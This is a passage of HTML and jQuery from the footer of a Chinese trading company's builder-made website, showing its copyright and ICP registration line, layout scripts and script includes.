ctype="companyinfo" class="esmartMargin smartAbs " cpid="30459" cstyle="Style4" ccolor="Item0" areaid="Area0" iscontainer="False" pvid="tem_73_20" tareaid="Area3" re-direction="all" daxis="All" isdeletable="True" style="height: 30px; width: 320px; left: 0px; top: 15px;z-index:2;"><div class="yibuFrameContent tem_74_40 companyinfo_Style4 " style="overflow:hidden;;"><div class="w-company-info iconStyle1"> <span class="company-info-item"> <a href="javascript:void(0)"> <span class="icon company-info-icon mw-icon-hide "> <i class="ltd-icon gs-gongsi"></i> </span> <span class="company-info-title" style="white-space:pre">版权所有 ©</span> <span class="company-info-text">天津鑫晨商贸有限公司 </span> </a> </span> </div></div></div><div id="smv_tem_77_45" ctype="text" class="esmartMargin smartAbs " cpid="30459" cstyle="Style1" ccolor="Item2" areaid="Area0" iscontainer="False" pvid="tem_73_20" tareaid="Area3" re-direction="all" daxis="All" isdeletable="True" style="height: 26px; width: 583px; left: 616px; top: 17px;z-index:3;"><div class="yibuFrameContent tem_77_45 text_Style1 " style="overflow:hidden;;"><div id='txt_tem_77_45' style="height: 100%;"> <div class="editableContent" id="txtc_tem_77_45" style="height: 100%; word-wrap:break-word;"> <p style="text-align:right"><a href="https://beian.miit.gov.cn/"><span style="color:#888888"><span style="letter-spacing:2.5px"><span style="font-size:14px"><span style="font-family:Source Han Sans,Geneva,sans-serif">津ICP备2025031070号 </span></span></span></span></p> </div> </div> <script> var tables = $(' #smv_tem_77_45').find('table') for (var i = 0; i < tables.length; i++) { var tab = tables[i] var borderWidth = $(tab).attr('border') if (borderWidth <= 0 || !borderWidth) { console.log(tab) $(tab).addClass('hidden-border') $(tab).children("tbody").children("tr").children("td").addClass('hidden-border') $(tab).children("tbody").children("tr").children("th").addClass('hidden-border') $(tab).children("thead").children("tr").children("td").addClass('hidden-border') $(tab).children("thead").children("tr").children("th").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("td").addClass('hidden-border') $(tab).children("tfoot").children("tr").children("th").addClass('hidden-border') } } </script></div></div></div> <div id="bannerWrap_tem_73_20" class="fullcolumn-outer" style="position: absolute; top: 0; bottom: 0;"> </div> <script type="text/javascript"> $(function () { var resize = function () { $("#smv_tem_73_20 >.yibuFrameContent>.fullcolumn-inner").width($("#smv_tem_73_20").parent().width()); $('#bannerWrap_tem_73_20').fullScreen(function (t) { if (VisitFromMobile()) { t.css("min-width", t.parent().width()) } }); } if (typeof (LayoutConverter) !== "undefined") { LayoutConverter.CtrlJsVariableList.push({ CtrlId: "tem_73_20", ResizeFunc: resize, }); } else { $(window).resize(function (e) { if (e.target == this) { resize(); } }); } resize(); }); </script> </div></div> </div> </div> <script type="text/javascript"> $(function () { // 延迟加载之后移除延迟属性,以便于被其他代码加载 $("img[loading='lazy']").on('load', function () { $(this).removeAttr('loading') }).each(function () { if (this.complete) { $(this).removeAttr('loading') } }) $("img.lazyload").lazyload({ skip_invisible: false, effect: "fadeIn", failure_limit: 15, threshold: 100 }); // 推后到OnAdjustFinished 中开启动画 // 非响应式正常初始化 if (typeof (LayoutConverter) === "undefined") { $('.animated').smanimate(); } $('.smartRecpt').smrecompute(); setCurrentPageTitle('首页', 2); xwezhan.initWz(); if ($("#txtDeviceSwitchEnabled").val() == "hide") { $(".m-deviceSwitch").css("display", "none"); } // 隐藏备案信息展示 $('div[ctype=companyinfo]').find('.company-info-title').each(function (i, it) { if ($(it).text().indexOf('备案') > -1 || $(it).next().text().toLowerCase().indexOf('icp') > -1) { $(it).parent().parent().css('display', 'none'); } }) var info = { icp: "", ga: '', copyright: '科技有限公司' != "" ? '版权所有© ' + '科技有限公司' : "", color: '#989898', background: '#ffffff', powerby: 'Powered by ' + 'CloudDream', ipv6: 'True' == 'True', ali: "True" == "True", style: 'style1', align: 'center', fontsize:12 }; _initData() _initShow() function _initData() { var linkUrl = "http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=" if (info.ga != "") { linkUrl = linkUrl + info.ga.substring(5, 19); } $('.ga_link').attr('href', linkUrl); $('.bottom-content').css({ 'text-align': info.align }) $('.icp-area .icp-words').text(info.icp) $('.ga-area .ga-words').text(info.ga) $('.copyright-area').text(info.copyright) $('.powerby-area').find('span').text(info.powerby) $('.page-bottom--area').css({ background: info.background }) $('.bottom-words').css({ color: info.color }) $('.bottom-border').css({ background: info.color }) $('.ipv6-box').css({ 'border-color': info.color }) $('.ali-area').find('svg g').css({ 'fill': info.color, height: info.fontsize, width: parseInt(info.fontsize * 55 / 13 + 'px') }) $('.ga-area').find('img').css({ width: info.fontszie + 'px' }) $('.ipv-area').css({ 'line-height': info.fontsize + 'px' }) $('.ali-area').find('svg g').css({ 'fill': info.color }) $('.divider').css({ height: info.fontsize + 'px' }) $('.ali-area').find('svg').css({ height: info.fontsize, width: parseInt(info.fontsize * 55 / 13 + 'px') }) $('.ga-area').find('img').css({ width: info.fontsize + 'px', height: info.fontsize + 'px' }) $('.page-bottom--area').find('.common-style').css({ fontSize: info.fontsize + 'px' }) } function _initShow() { if ("True" == "False") { $('.top-area').css('display', 'none'); } if (info.style === 'style1') { $('#b_style1').css('display', 'block'); if (!info.ga) { $('.ga-area').hide() $('.ga-area') .prev('.divider') .hide() } if (!info.icp) { $('.icp-area').hide() $('.icp-area') .next('.divider') .hide() } } if (info.style === 'style2') { $('#b_style2').css('display', 'block'); if (!info.ga) { $('.ga-area').hide() $('.ga-area') .next('.divider') .hide() } if (!info.icp) { $('.icp-area').hide() $('.icp-area') .prev('.divider') .hide() } } if (info.style === 'style3') { $('#b_style3').css('display', 'block'); if (!info.ga) { $('.ga-area').hide() $('.ga-area') .next('.divider') .hide() } if (!info.copyright) { $('.copyright-area').hide() $('.copyright-area') .prev('.divider') .hide() } if (!info.icp) { $('.icp-area').hide() $('.icp-area') .prev('.divider') .hide() $('.copyright-area').hide() $('.copyright-area') .prev('.divider') .hide() } if (!info.ga && !info.copyright) { $('.copyright-area').hide() $('.copyright-area') .next('.divider') .hide() } } if (info.style === 'style4') { $('#b_style4').css('display', 'block'); if (!info.icp) { $('.icp-area').hide() $('.icp-area') .prev('.divider') .hide() $('.copyright-area').hide() $('.copyright-area') .next('.divider') .hide() } if (!info.copyright) { $('.copyright-area').hide() $('.copyright-area') .next('.divider') .hide() } if (!info.ga) { $('.ga-area').hide() $('.ga-area') .prev('.divider') .hide() } if (!info.icp && !info.copyright) { $('.icp-area').hide() $('.icp-area') .next('.divider') .hide() } } if ("True".toLowerCase() == "false") { $('.ali-area').hide() $('.ali-area') .next('.divider') .hide() } if ("True".toLowerCase() == "false") { $('.ipv-area').hide() $('.ipv-area') .prev('.divider') .hide() } if ("True".toLowerCase() == "false") { $('.powerby-area').hide() $('.powerby-area') .prev('.divider') .hide() } if ("True".toLowerCase() == "false" && "True".toLowerCase() == "false") { $('.ipv-area').hide() $('.ipv-area') .next('.divider') .hide() } if ((!info.ga && !info.icp) || ("True".toLowerCase() == "false" && "True".toLowerCase() == "false" && "True".toLowerCase() == "false")) { $('.top-area').css({ 'margin-bottom': 0 }) } if (!info.ga && !info.icp && "True".toLowerCase() == "false" && "True".toLowerCase() == "false" && "True".toLowerCase() == "false") { $('#all-icp-bottom').css({ 'display': 'none' }); } } }); </script> <div id="systemDialogLayer" style="position:relative;z-index:999999"></div> <script src="static/js/polyfill.min.js" type="text/javascript"></script><link href="static/css/slicknav.css" rel="stylesheet" type="text/css"><script src="static/js/jquery.slicknav.min.js" type="text/javascript"></script><script src="static/js/modernizr.min.js" type="text/javascript"></script> <script type="text/javascript" src="static/js/ResponsiveJsLoader.js" dynamicloadpath="https://ntemimg.wezhan.cn/Designer/Scripts/Responsive/CtrlAdjuster/Core-Babeled.js?_version=20250314160851"></script> <a href="https://smalltool.github.io/" style="display:none;">网站整站下载器</a> </body> </html>